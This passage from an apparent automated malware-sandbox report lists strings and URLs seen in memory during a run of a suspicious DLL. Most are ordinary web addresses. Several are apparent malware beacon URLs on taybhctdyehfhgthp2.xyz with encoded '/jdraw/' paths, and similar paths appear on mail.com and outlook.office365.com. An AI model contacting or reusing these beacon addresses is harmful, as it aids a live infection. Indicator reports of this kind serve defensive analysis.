Online|https://office.live.com/start/Excel.aspx?WT.mc_id=MSN_site;Sway|https://www.sway.com/?WT.mc_id=MSN_site&utm_source=MSN&utm_medium=Topnav&utm_campaign=link;PowerPoint Online|https://office.live.com/start/PowerPoint.aspx?WT.mc_id=MSN_site"},{header:"Aktuelle Dokumente",headerUrl:"https://onedrive.live.com/#qt=mru",content:"Wird geladen ...",noContent:"Dieser Ordner ist leer. Klicken Sie unten, um ein neues Dokument zu erstellen.",errorMessage:"Keine Verbindung mit Office Online m equals www.hotmail.com (Hotmail)
Source: potec.core.min[2].js.20.dr	String found in binary or memory: zh.prototype.f=function(){var a=this;this.url=z.R(this.a,"data-url")||window.location.href;this.Md="menubar\x3dno,toolbar\x3dno,resizable\x3dyes,scrollbars\x3dyes,height\x3d500,width\x3d500";this.a.find("[data-social]").b("click",function(b){b.preventDefault();switch(this.getAttribute("data-social")){case "facebook":window.open("https://www.facebook.com/sharer/sharer.php?u\x3d"+(0,window.encodeURIComponent)(a.url),"",a.Md);break;case "twitter":window.open("https://twitter.com/intent/tweet?text\x3d"+(0,window.encodeURIComponent)(window.document.title)+ equals www.facebook.com (Facebook)
Source: potec.core.min[2].js.20.dr	String found in binary or memory: zh.prototype.f=function(){var a=this;this.url=z.R(this.a,"data-url")||window.location.href;this.Md="menubar\x3dno,toolbar\x3dno,resizable\x3dyes,scrollbars\x3dyes,height\x3d500,width\x3d500";this.a.find("[data-social]").b("click",function(b){b.preventDefault();switch(this.getAttribute("data-social")){case "facebook":window.open("https://www.facebook.com/sharer/sharer.php?u\x3d"+(0,window.encodeURIComponent)(a.url),"",a.Md);break;case "twitter":window.open("https://twitter.com/intent/tweet?text\x3d"+(0,window.encodeURIComponent)(window.document.title)+ equals www.twitter.com (Twitter)

Performs DNS lookups

Source: unknown

DNS traffic detected: queries for: www.msn.com

URLs found in memory or binary data

Source: powershell.exe, 00000021.00000002.514361003.000001E9C3DA0000.00000004.00000001.sdmp	String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: head.min[2].js.21.dr	String found in binary or memory: http://modernizr.com/download/?-csstransforms-csstransforms3d-csstransitions-flexbox-flexboxlegacy-f
Source: powershell.exe, 00000021.00000002.499970967.000001E9ABB99000.00000004.00000001.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: de-ch[1].htm.6.dr	String found in binary or memory: http://ogp.me/ns#
Source: de-ch[1].htm.6.dr	String found in binary or memory: http://ogp.me/ns/fb#
Source: powershell.exe, 00000021.00000002.497662927.000001E9ABA9D000.00000004.00000001.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: auction[1].htm.6.dr	String found in binary or memory: http://popup.taboola.com/german
Source: powershell.exe, 00000021.00000002.495394325.000001E9AB881000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: picturefill.min[2].js.21.dr	String found in binary or memory: http://scottjehl.github.io/picturefill
Source: ~DF745D33E3B1706BEF.TMP.4.dr	String found in binary or memory: http://searchads.msn.net/.cfm?&&kp=1&
Source: imagestore.dat.4.dr	String found in binary or memory: http://taybhctdyehfhgthp2.xyz/favicon.ico
Source: imagestore.dat.4.dr, imagestore.dat.24.dr	String found in binary or memory: http://taybhctdyehfhgthp2.xyz/favicon.ico~
Source: loaddll32.exe, 00000000.00000002.494477774.00000000028B0000.00000002.00000001.sdmp, regsvr32.exe, 00000002.00000002.493831362.0000000003560000.00000002.00000001.sdmp, rundll32.exe, 00000003.00000002.495111751.00000000031E0000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.493865166.0000000002C60000.00000002.00000001.sdmp, powershell.exe, 00000021.00000002.495164163.000001E9AA3A0000.00000002.00000001.sdmp	String found in binary or memory: http://taybhctdyehfhgthp2.xyz/jdraw/2dmHXVLFpoxZkp/lRnXRf4rg4uMzmmWxeqRM/HUrKxMJE8mnsaP3a/BSrsC
Source: ~DF41C6F94D5CD15673.TMP.4.dr, {855EF56B-DEA1-11EB-90E5-ECF4BB570DC9}.dat.4.dr	String found in binary or memory: http://taybhctdyehfhgthp2.xyz/jdraw/2dmHXVLFpoxZkp/lRnXRf4rg4uMzmmWxeqRM/HUrKxMJE8mnsaP3a/BSrsCvSsG_
Source: {7E89C2B0-DEA1-11EB-90E5-ECF4BB570DC9}.dat.4.dr	String found in binary or memory: http://taybhctdyehfhgthp2.xyz/jdraw/6egkLxw_2B/0MDk_2F6Dttk_2BDL/PeMCvV_2FKSI/4qVuvEJzX6I/FapijqFJTF
Source: loaddll32.exe, 00000000.00000002.494477774.00000000028B0000.00000002.00000001.sdmp, regsvr32.exe, 00000002.00000002.493831362.0000000003560000.00000002.00000001.sdmp, rundll32.exe, 00000003.00000002.495111751.00000000031E0000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.493865166.0000000002C60000.00000002.00000001.sdmp, powershell.exe, 00000021.00000002.495164163.000001E9AA3A0000.00000002.00000001.sdmp	String found in binary or memory: http://taybhctdyehfhgthp2.xyz/jdraw/WEqyJQ4Nq2nQ9ndVH/biMw8nJM827T/xrW3osP_2Bm/N3LwbnFmUNMeEO/_
Source: {855EF56F-DEA1-11EB-90E5-ECF4BB570DC9}.dat.4.dr	String found in binary or memory: http://taybhctdyehfhgthp2.xyz/jdraw/WEqyJQ4Nq2nQ9ndVH/biMw8nJM827T/xrW3osP_2Bm/N3LwbnFmUNMeEO/_2FGDU
Source: {855EF565-DEA1-11EB-90E5-ECF4BB570DC9}.dat.4.dr	String found in binary or memory: http://taybhctdyehfhgthp2.xyz/jdraw/WzEyJLB3xlLsnabkhWyV0S/yaPNrrtbEg_2F/gaaPNPvk/KT7taNsNnsmIKyasgT
Source: {855EF567-DEA1-11EB-90E5-ECF4BB570DC9}.dat.4.dr	String found in binary or memory: http://taybhctdyehfhgthp2.xyz/jdraw/_2F4Q_2FnvV/BpomczM_2B2Jkp/FRSRsBJeoQn3RBrurQkGr/rDwzJqou7P_2BXV
Source: regsvr32.exe, 00000002.00000003.443079927.0000000000FA6000.00000004.00000001.sdmp, regsvr32.exe, 00000002.00000003.449890732.0000000000F96000.00000004.00000001.sdmp, ~DF434D42DEB8F7938B.TMP.4.dr, {7E89C2AA-DEA1-11EB-90E5-ECF4BB570DC9}.dat.4.dr	String found in binary or memory: http://taybhctdyehfhgthp2.xyz/jdraw/_2Faxv8_2Bu0S355431/zWBmIqRqQnvMB_2FKOk6CG/NwnPAjKDdicU7/LyyqKz0
Source: ~DFC0327530F4C9EDC8.TMP.4.dr, {855EF56D-DEA1-11EB-90E5-ECF4BB570DC9}.dat.4.dr	String found in binary or memory: http://taybhctdyehfhgthp2.xyz/jdraw/gtqnX1_2BBrthQ/u3Ow9U77gyB4yz7FWcMqW/MB7b6_2BOONkcuHq/pp1MQOLvSN
Source: rundll32.exe, 00000003.00000003.475793042.0000000002DD3000.00000004.00000001.sdmp, ~DF58DEFE5429921A67.TMP.4.dr, {855EF569-DEA1-11EB-90E5-ECF4BB570DC9}.dat.4.dr	String found in binary or memory: http://taybhctdyehfhgthp2.xyz/jdraw/p5RR5qqGgi5cTLPxy/2iFqCZAtdge9/_2B0gp3GesH/Xr71XWjGQYQuWa/hA9AKk
Source: {7E89C2AC-DEA1-11EB-90E5-ECF4BB570DC9}.dat.4.dr	String found in binary or memory: http://taybhctdyehfhgthp2.xyz/jdraw/tR4LnoSVINT1f2c/0VvJfJtFJ0fvpQScRR/CPWVnO7Ig/8xymBr8_2BV2MPJj4Wb
Source: msapplication.xml.4.dr	String found in binary or memory: http://www.amazon.com/
Source: powershell.exe, 00000021.00000002.497662927.000001E9ABA9D000.00000004.00000001.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: msapplication.xml1.4.dr	String found in binary or memory: http://www.google.com/
Source: 52-478955-68ddb2ab[1].js.6.dr	String found in binary or memory: http://www.hotmail.msn.com/pii/ReadOutlookEmail/
Source: msapplication.xml2.4.dr	String found in binary or memory: http://www.live.com/
Source: msapplication.xml3.4.dr	String found in binary or memory: http://www.nytimes.com/
Source: msapplication.xml4.4.dr	String found in binary or memory: http://www.reddit.com/
Source: msapplication.xml5.4.dr	String found in binary or memory: http://www.twitter.com/
Source: msapplication.xml6.4.dr	String found in binary or memory: http://www.wikipedia.com/
Source: msapplication.xml7.4.dr	String found in binary or memory: http://www.youtube.com/
Source: gtm[1].js.20.dr	String found in binary or memory: https://adservice.google.com/pagead/regclk
Source: de-ch[1].htm.6.dr	String found in binary or memory: https://amzn.to/2TTxhNg
Source: auction[1].htm.6.dr	String found in binary or memory: https://api.taboola.com/2.0/json/msn-ch-de-home/recommendations.notify-click?app.type=desktop&ap
Source: de-ch[1].htm.6.dr	String found in binary or memory: https://apps.apple.com/ch/app/microsoft-news/id945416273?pt=80423&ct=prime_footer&mt=8
Source: gtm[1].js.20.dr, optimize[1].js.20.dr	String found in binary or memory: https://cct.google/taggy/agent.js
Source: 55a804ab-e5c6-4b97-9319-86263d365d28[1].json.6.dr	String found in binary or memory: https://cdn.cookielaw.org/vendorlist/googleData.json
Source: 55a804ab-e5c6-4b97-9319-86263d365d28[1].json.6.dr	String found in binary or memory: https://cdn.cookielaw.org/vendorlist/iab2Data.json
Source: 55a804ab-e5c6-4b97-9319-86263d365d28[1].json.6.dr	String found in binary or memory: https://cdn.cookielaw.org/vendorlist/iabData.json
Source: de-ch[1].htm.6.dr	String found in binary or memory: https://click.linksynergy.com/deeplink?id=xoqYgl4JDe8&mid=46130&u1=dech_mestripe_office&
Source: de-ch[1].htm.6.dr	String found in binary or memory: https://click.linksynergy.com/deeplink?id=xoqYgl4JDe8&mid=46130&u1=dech_mestripe_store&m
Source: de-ch[1].htm.6.dr	String found in binary or memory: https://click.linksynergy.com/deeplink?id=xoqYgl4JDe8&mid=46130&u1=dech_promotionalstripe_na
Source: 52-478955-68ddb2ab[1].js.6.dr	String found in binary or memory: https://client-s.gateway.messenger.live.com
Source: de-ch[1].htm.6.dr	String found in binary or memory: https://clk.tradedoubler.com/click?p=245744&a=3064090&g=21863656
Source: de-ch[1].htm.6.dr	String found in binary or memory: https://clkde.tradedoubler.com/click?p=245744&a=3064090&g=24545562
Source: de-ch[1].htm.6.dr	String found in binary or memory: https://clkde.tradedoubler.com/click?p=245744&a=3064090&g=24545562&epi=de-ch
Source: de-ch[1].htm.6.dr	String found in binary or memory: https://clkde.tradedoubler.com/click?p=295926&a=3064090&g=24886692
Source: ~DF745D33E3B1706BEF.TMP.4.dr	String found in binary or memory: https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2
Source: de-ch[1].htm.6.dr	String found in binary or memory: https://contextual.media.net/medianet.php?cid=8CU157172
Source: de-ch[1].htm.6.dr	String found in binary or memory: https://contextual.media.net/medianet.php?cid=8CU157172&crid=722878611&size=306x271&http
Source: de-ch[1].htm.6.dr	String found in binary or memory: https://contextual.media.net/medianet.php?cid=8CU157172&crid=858412214&size=306x271&http
Source: ~DF745D33E3B1706BEF.TMP.4.dr	String found in binary or memory: https://contextual.media.net/medianet.php?cid=8CU157172&crid=722878611&size=306x271&https=1
Source: ~DF745D33E3B1706BEF.TMP.4.dr	String found in binary or memory: https://contextual.media.net/medianet.php?cid=8CU157172&crid=858412214&size=306x271&https=1
Source: powershell.exe, 00000021.00000002.499970967.000001E9ABB99000.00000004.00000001.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000021.00000002.499970967.000001E9ABB99000.00000004.00000001.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000021.00000002.499970967.000001E9ABB99000.00000004.00000001.sdmp	String found in binary or memory: https://contoso.com/License
Source: consentpage[1].htm.19.dr	String found in binary or memory: https://dl.mail.com/permission/live/v1/ppp/js/permission-client.js
Source: consentpage[1].htm.19.dr	String found in binary or memory: https://dl.mail.com/tcf/live/v1/js/tcf-api.js
Source: 55a804ab-e5c6-4b97-9319-86263d365d28[1].json.6.dr	String found in binary or memory: https://geolocation.onetrust.com/cookieconsentpub/v1/geo/location
Source: powershell.exe, 00000021.00000002.497662927.000001E9ABA9D000.00000004.00000001.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: url-polyfill[1].js.19.dr	String found in binary or memory: https://github.com/WebReflection/url-search-params/blob/master/src/url-search-params.js
Source: url-polyfill[1].js.19.dr	String found in binary or memory: https://github.com/arv/DOM-URL-Polyfill/blob/master/src/url.js
Source: bundle.min[1].js.19.dr	String found in binary or memory: https://github.com/getsentry/sentry-javascript
Source: permission-client[1].js.19.dr	String found in binary or memory: https://github.com/js-cookie/js-cookie
Source: picturefill.min[2].js.21.dr	String found in binary or memory: https://github.com/scottjehl/picturefill/blob/master/Authors.txt;
Source: auction[1].htm.6.dr	String found in binary or memory: https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:au
Source: core[1].htm.19.dr	String found in binary or memory: https://img.ui-portal.de/pos-cdn/tracklib/4.3.0/polyfills.min.js
Source: core[1].htm.19.dr	String found in binary or memory: https://img.ui-portal.de/pos-cdn/tracklib/4.3.0/tracklib.min.js
Source: de-ch[1].htm.6.dr	String found in binary or memory: https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=13&ct=1625574581&rver=7.0.6730.0&am
Source: de-ch[1].htm.6.dr	String found in binary or memory: https://login.live.com/logout.srf?ct=1625574582&rver=7.0.6730.0&lc=1033&id=1184&lru=
Source: de-ch[1].htm.6.dr	String found in binary or memory: https://login.live.com/me.srf?wa=wsignin1.0&rpsnv=13&ct=1625574581&rver=7.0.6730.0&w
Source: 52-478955-68ddb2ab[1].js.6.dr	String found in binary or memory: https://login.skype.com/login/oauth/microsoft?client_id=738133
Source: 6QglyA[1].htm.19.dr	String found in binary or memory: https://mail.com/jdraw/GTAeWl1dTEKsPGzboniA9C/3TQSND4hN4q8j/tJxnEgfP/uW5VGwHzywLraum6aAQWdJy/1RqIzWD
Source: powershell.exe, 00000021.00000002.499970967.000001E9ABB99000.00000004.00000001.sdmp	String found in binary or memory: https://nuget.org/nuget.exe
Source: 52-478955-68ddb2ab[1].js.6.dr	String found in binary or memory: https://office.live.com/start/Excel.aspx?WT.mc_id=MSN_site;Sway
Source: 52-478955-68ddb2ab[1].js.6.dr	String found in binary or memory: https://office.live.com/start/PowerPoint.aspx?WT.mc_id=MSN_site
Source: 52-478955-68ddb2ab[1].js.6.dr	String found in binary or memory: https://office.live.com/start/Word.aspx?WT.mc_id=MSN_site;Excel
Source: 52-478955-68ddb2ab[1].js.6.dr	String found in binary or memory: https://onedrive.live.com/#qt=mru
Source: 52-478955-68ddb2ab[1].js.6.dr	String found in binary or memory: https://onedrive.live.com/?qt=allmyphotos;Aktuelle
Source: 52-478955-68ddb2ab[1].js.6.dr	String found in binary or memory: https://onedrive.live.com/?qt=mru;Aktuelle
Source: 52-478955-68ddb2ab[1].js.6.dr	String found in binary or memory: https://onedrive.live.com/?qt=mru;OneDrive-App
Source: de-ch[1].htm.6.dr	String found in binary or memory: https://onedrive.live.com/?wt.mc_id=oo_msn_msnhomepage_header
Source: 52-478955-68ddb2ab[1].js.6.dr	String found in binary or memory: https://onedrive.live.com/about/en/download/
Source: 52-478955-68ddb2ab[1].js.6.dr	String found in binary or memory: https://onedrive.live.com;Fotos
Source: 52-478955-68ddb2ab[1].js.6.dr	String found in binary or memory: https://onedrive.live.com;OneDrive-App
Source: 52-478955-68ddb2ab[1].js.6.dr	String found in binary or memory: https://onedrive.live.com?wt.mc_id=oo_msn_msnhomepage_header
Source: de-ch[1].htm.6.dr	String found in binary or memory: https://outlook.com/
Source: 52-478955-68ddb2ab[1].js.6.dr	String found in binary or memory: https://outlook.live.com/calendar
Source: 52-478955-68ddb2ab[1].js.6.dr	String found in binary or memory: https://outlook.live.com/mail/deeplink/compose;Kalender
Source: {61C46D29-DEA1-11EB-90E5-ECF4BB570DC9}.dat.4.dr	String found in binary or memory: https://outlook.office365.com/jdraw/AsyRg_2BVSdI/XmsSORBsoAL/M5uOi2ty5xn2OE/ER18j8gGrXEoZA_2FCM38/1O
Source: {61C46D27-DEA1-11EB-90E5-ECF4BB570DC9}.dat.4.dr	String found in binary or memory: https://outlook.office365.com/jdraw/YV9_2BRIFh2A/q7dpbh5Wtee/h9DRSfahzOVkbw/8nj9JvAX9J0uIFu5B3_2B/oU
Source: {7E89C2AE-DEA1-11EB-90E5-ECF4BB570DC9}.dat.4.dr	String found in binary or memory: https://outlook.office365.com/jdraw/vqfQiI7wHQRYBipo/2YRO_2BiyLl_2Fp/6B0k0PRCnXIV6OmEu7/x1gwiJ0go/pe
Source: ~DF5F04A478F43FE59C.TMP.4.dr, {61C46D25-DEA1-11EB-90E5-ECF4BB570DC9}.dat.4.dr	String found in binary or memory: https://outlook.office365.com/jdraw/yH91aKnpTrUgeTTXk_2FC/UNtUKwQdb1VcS_2B/GaoM_2Fyx_2BE1f/CKkjJtxju
Source: gtm[1].js.20.dr	String found in binary or memory: https://pagead2.googlesyndication.com
Source: de-ch[1].htm.6.dr	String found in binary or memory: https://play.google.com/intl/en_us/badges/images/generic/de_badge_web_generic.png"
Source: de-ch[1].htm.6.dr	String found in binary or memory: https://play.google.com/store/apps/details?id=com.microsoft.amp.apps.bingnews&hl=de-ch&refer
Source: potec.core.min[2].js.20.dr	String found in binary or memory: https://popup.taboola.com/
Source: ~DF745D33E3B1706BEF.TMP.4.dr	String found in binary or memory: https://res-a.akamaihd.net/__media__/pics/8000/72/941/fallback1.jpg
Source: rundll32.exe, 00000003.00000003.417150928.000000000516A000.00000004.00000040.sdmp, rundll32.exe, 00000005.00000002.493465480.000000000296A000.00000004.00000020.sdmp, rundll32.exe, 00000005.00000003.460407663.0000000004B2B000.00000004.00000040.sdmp	String found in binary or memory: https://s.uicdn.com/mailint/9.1722.0/
Source: consentpage[1].htm.19.dr	String found in binary or memory: https://s.uicdn.com/mailint/9.1722.0/assets/consent/consent-management.js
Source: consentpage[1].htm.19.dr	String found in binary or memory: https://s.uicdn.com/mailint/9.1722.0/assets/consent/mailcom/spinner.gif
Source: consentpage[1].htm.19.dr	String found in binary or memory: https://s.uicdn.com/mailint/9.1722.0/assets/consent/mailcom/styles.css
Source: consentpage[1].htm.19.dr	String found in binary or memory: https://s.uicdn.com/mailint/9.1722.0/assets/consent/main.js
Source: consentpage[1].htm.19.dr	String found in binary or memory: https://s.uicdn.com/mailint/9.1722.0/assets/favicon.ico
Source: imagestore.dat.19.dr, imagestore.dat.4.dr	String found in binary or memory: https://s.uicdn.com/mailint/9.1722.0/assets/favicon.ico~
Source: rundll32.exe, 00000003.00000003.417150928.000000000516A000.00000004.00000040.sdmp, rundll32.exe, 00000005.00000002.493465480.000000000296A000.00000004.00000020.sdmp, rundll32.exe, 00000005.00000003.460407663.0000000004B2B000.00000004.00000040.sdmp	String found in binary or memory: https://s.uicdn.com/mailint/9.1722.0/assets/potec.core.min.js
Source: core[1].htm.19.dr	String found in binary or memory: https://s.uicdn.com/shared/sentry/5.5.0/bundle.min.js
Source: core[1].htm.19.dr	String found in binary or memory: https://s.uicdn.com/tcf/live/v1/js/tcf-api.js
Source: de-ch[1].htm.6.dr	String found in binary or memory: https://sp.booking.com/index.html?aid=1589774&label=dech-prime-hp-me
Source: de-ch[1].htm.6.dr	String found in binary or memory: https://sp.booking.com/index.html?aid=1589774&label=dech-prime-hp-shoppingstripe-nav
Source: de-ch[1].htm.6.dr	String found in binary or memory: https://sp.booking.com/index.html?aid=1589774&label=travelnavlink
Source: imagestore.dat.4.dr	String found in binary or memory: https://static-global-s-msn-com.akamaized.net/hp-neu/sc/2b/a5ea21.ico
Source: de-ch[1].htm.6.dr	String found in binary or memory: https://static-global-s-msn-com.akamaized.net/hp-neu/sc/c6/519670.jpg
Source: de-ch[1].htm.6.dr	String found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AALPDkd.img?h=368&
Source: de-ch[1].htm.6.dr	String found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB12jAN6.img?h=27&
Source: de-ch[1].htm.6.dr	String found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB1aXITZ.img?h=27&
Source: de-ch[1].htm.6.dr	String found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB1cEP3G.img?h=27&
Source: de-ch[1].htm.6.dr	String found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB1cG73h.img?h=27&
Source: de-ch[1].htm.6.dr	String found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBPfCZL.img?h=27&w
Source: de-ch[1].htm.6.dr	String found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBX2afX.img?h=27&w
Source: 52-478955-68ddb2ab[1].js.6.dr	String found in binary or memory: https://support.skype.com
Source: de-ch[1].htm.6.dr	String found in binary or memory: https://tools.applemediaservices.com/api/badges/download-on-the-app-store/black/de-de?"
Source: de-ch[1].htm.6.dr	String found in binary or memory: https://twitter.com/
Source: 52-478955-68ddb2ab[1].js.6.dr	String found in binary or memory: https://twitter.com/i/notifications;Ich
Source: url-polyfill[1].js.19.dr	String found in binary or memory: https://url.spec.whatwg.org/#urlencoded-serializing
Source: main[1].js.19.dr	String found in binary or memory: https://wa.mail.com/1and1/mailcom/s?_c=0&name=
Source: rundll32.exe, 00000003.00000003.417150928.000000000516A000.00000004.00000040.sdmp, rundll32.exe, 00000005.00000002.493465480.000000000296A000.00000004.00000020.sdmp, rundll32.exe, 00000005.00000003.460407663.0000000004B2B000.00000004.00000040.sdmp	String found in binary or memory: https://wa.ui-portal.de/opt-out-transfer/mailcom/
Source: de-ch[1].htm.6.dr	String found in binary or memory: https://web.vortex.data.msn.com/collect/v1/t.gif?name=%27Ms.Webi.PageView%27&ver=%272.1%27&a
Source: de-ch[1].htm.6.dr	String found in binary or memory: https://www.awin1.com/cread.php?awinmid=11518&awinaffid=696593&clickref=dech-edge-dhp-infopa
Source: de-ch[1].htm.6.dr	String found in binary or memory: https://www.awin1.com/cread.php?awinmid=15168&awinaffid=696593&clickref=de-ch-edge-dhp-river
Source: iab2Data[1].json.6.dr	String found in binary or memory: https://www.bidstack.com/privacy-policy/
Source: de-ch[1].htm.6.dr	String found in binary or memory: https://www.ebay.ch/?mkcid=1&mkrid=5222-53480-19255-0&siteid=193&campid=5338626668&t
Source: optimize[1].js.20.dr	String found in binary or memory: https://www.google-analytics.com/gtm/optimize-dyn.js?id=OPT-KKZDDV4
Source: gtm[1].js.20.dr	String found in binary or memory: https://www.google.com
Source: gtm[1].js.20.dr	String found in binary or memory: https://www.google.com/pagead/conversion_async.js
Source: gtm[1].js.20.dr, optimize[1].js.20.dr	String found in binary or memory: https://www.googletagmanager.com/a?id=
Source: gtm[1].js.20.dr, optimize[1].js.20.dr	String found in binary or memory: https://www.googletagmanager.com/debug/bootstrap
Source: consentpage[1].htm.19.dr	String found in binary or memory: https://www.mail.com/
Source: {70188A21-DEA1-11EB-90E5-ECF4BB570DC9}.dat.4.dr	String found in binary or memory: https://www.mail.com/cdraw/GTAeWl1dTEKsPGzboniA9C/3TQSND4hN4q8j/tJxnEgfP/uW5VGwHzywLraum6aAQWdJy/1Rq
Source: ~DFFEBFC8E2AAC9D5AE.TMP.4.dr	String found in binary or memory: https://www.mail.com/consentpage
Source: consentpage[1].htm.19.dr	String found in binary or memory: https://www.mail.com/consentpage/event/error
Source: consentpage[1].htm.19.dr	String found in binary or memory: https://www.mail.com/consentpage/event/visit
Source: {70188A21-DEA1-11EB-90E5-ECF4BB570DC9}.dat.4.dr, ~DFFEBFC8E2AAC9D5AE.TMP.4.dr	String found in binary or memory: https://www.mail.com/consentpagedTEKsPGzboniA9C/3TQSND4hN4q8j/tJxnEgfP/uW5VGwHzywLraum6aAQWdJy/1RqIz
Source: {70188A25-DEA1-11EB-90E5-ECF4BB570DC9}.dat.4.dr, oo[1].htm.21.dr	String found in binary or memory: https://www.mail.com/jdraw/9tkEtPTF5MzOOTf_2FG/_2BMvSXij6Fsy_2BER4N9C/SpLKSbyOlvF_2/BLMV4YMk/qYA4T6z
Source: {70188A21-DEA1-11EB-90E5-ECF4BB570DC9}.dat.4.dr, 6QglyA[1].htm0.19.dr, ~DFFEBFC8E2AAC9D5AE.TMP.4.dr	String found in binary or memory: https://www.mail.com/jdraw/GTAeWl1dTEKsPGzboniA9C/3TQSND4hN4q8j/tJxnEgfP/uW5VGwHzywLraum6aAQWdJy/1Rq
Source: {70188A23-DEA1-11EB-90E5-ECF4BB570DC9}.dat.4.dr	String found in binary or memory: https://www.mail.com/jdraw/WnmF6eBzbS4v4TjN/7UGwCeEGSR1XiD4/8mGx_2FhBXyZeffjUR/XcFqU9lGL/EaceGHrOi2o
Source: de-ch[1].htm.6.dr	String found in binary or memory: https://www.msn.com/de-ch
Source: de-ch[1].htm.6.dr	String found in binary or memory: https://www.msn.com/de-ch/
Source: ~DF745D33E3B1706BEF.TMP.4.dr	String found in binary or memory: https://www.msn.com/de-ch/?ocid=iehp
Source: de-ch[1].htm.6.dr	String found in binary or memory: https://www.msn.com/de-ch/?ocid=iehp&item=deferred_page%3a1&ignorejs=webcore%2fmodules%2fjsb
Source: de-ch[1].htm.6.dr	String found in binary or memory: https://www.msn.com/de-ch/nachrichten/coronareisen
Source: de-ch[1].htm.6.dr	String found in binary or memory: https://www.msn.com/de-ch/nachrichten/regional
Source: de-ch[1].htm.6.dr	String found in binary or memory: https://www.msn.com/de-ch/nachrichten/schweiz/transparenz-streit-bundesgericht-weist-beschwerde-des-
Source: de-ch[1].htm.6.dr	String found in binary or memory: https://www.msn.com/de-ch/nachrichten/z%c3%bcrich/corona-demonstrantin-wegen-%c3%bcbertretung-mit-80
Source: de-ch[1].htm.6.dr	String found in binary or memory: https://www.msn.com/de-ch/nachrichten/z%c3%bcrich/ging-im-z%c3%bcrcher-nachtleben-ein-serienvergewal
Source: de-ch[1].htm.6.dr	String found in binary or memory: https://www.msn.com/de-ch/nachrichten/z%c3%bcrich/ich-hoffe-dass-wir-den-anarchischen-geist-verteidi
Source: de-ch[1].htm.6.dr	String found in binary or memory: https://www.msn.com/de-ch/news/other/das-gequake-ist-untragbar-fr%c3%b6sche-rauben-nachbarn-den-schl
Source: de-ch[1].htm.6.dr	String found in binary or memory: https://www.msn.com/de-ch/news/other/kaum-verlangsamung-winterthur-plant-tempo-30-auf-fast-allen-str
Source: de-ch[1].htm.6.dr	String found in binary or memory: https://www.msn.com/de-ch/news/other/man-kann-ja-gleich-das-fahrzeug-schieben/ar-AALPtdx?ocid=hploca
Source: de-ch[1].htm.6.dr	String found in binary or memory: https://www.msn.com/de-ch/news/other/so-sieht-die-neue-z%c3%bcrcher-promenade-am-see-aus/ar-AALPcHN?
Source: de-ch[1].htm.6.dr	String found in binary or memory: https://www.msn.com/de-ch/news/other/stadtrat-will-fl%c3%a4chendeckend-tempo-30/ar-AALP5m6?ocid=hplo
Source: de-ch[1].htm.6.dr	String found in binary or memory: https://www.msn.com/de-ch/news/other/vbz-kaufen-15-elektrobusse-%c3%bcber-100-weitere-sollen-folgen/
Source: de-ch[1].htm.6.dr	String found in binary or memory: https://www.msn.com/de-ch/sport?ocid=StripeOCID
Source: de-ch[1].htm.6.dr	String found in binary or memory: https://www.msn.com?form=MY01O4&OCID=MY01O4
Source: 52-478955-68ddb2ab[1].js.6.dr	String found in binary or memory: https://www.onenote.com/notebooks?WT.mc_id=MSN_OneNote_QuickNote&auth=1
Source: 52-478955-68ddb2ab[1].js.6.dr	String found in binary or memory: https://www.onenote.com/notebooks?WT.mc_id=MSN_OneNote_Recent&auth=1&wdorigin=msn
Source: de-ch[1].htm.6.dr	String found in binary or memory: https://www.onenote.com/notebooks?WT.mc_id=MSN_OneNote_TopMenu&auth=1&wdorigin=msn
Source: de-ch[1].htm.6.dr	String found in binary or memory: https://www.ricardo.ch/?utm_source=msn&utm_medium=affiliate&utm_campaign=msn_mestripe_logo_d
Source: de-ch[1].htm.6.dr	String found in binary or memory: https://www.ricardo.ch/?utm_source=msn&utm_medium=affiliate&utm_campaign=msn_shop_de&utm
Source: de-ch[1].htm.6.dr	String found in binary or memory: https://www.skype.com/
Source: 52-478955-68ddb2ab[1].js.6.dr	String found in binary or memory: https://www.skype.com/de
Source: 52-478955-68ddb2ab[1].js.6.dr	String found in binary or memory: https://www.skype.com/de/download-skype
Source: 52-478955-68ddb2ab[1].js.6.dr	String found in binary or memory: https://www.skype.com/go/onedrivepromo.download?cm_mmc=MSFT_2390_MSN-com
Source: de-ch[1].htm.6.dr	String found in binary or memory: https://www.skyscanner.net/flights?associateid=API_B2B_19305_00001&vertical=custom&pageType=
Source: de-ch[1].htm.6.dr	String found in binary or memory: https://www.skyscanner.net/g/referrals/v1/cars/home?associateid=API_B2B_19305_00002
Source: iab2Data[1].json.6.dr	String found in binary or memory: https://www.stroeer.com/fileadmin/com/StroeerDSP_deviceStorage.json
Source: iab2Data[1].json.6.dr	String found in binary or memory: https://www.stroeer.de/konvergenz-konzepte/daten-technologien/stroeer-ssp/datenschutz-ssp.html
Source: 52-478955-68ddb2ab[1].js.6.dr	String found in binary or memory: https://www.sway.com/?WT.mc_id=MSN_site&utm_source=MSN&utm_medium=Topnav&utm_campaign=link;PowerPoin
Source: potec.core.min[2].js.20.dr	String found in binary or memory: https://www.youtube.com/embed/SrLZgP-OR6s

Uses HTTPS

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49742
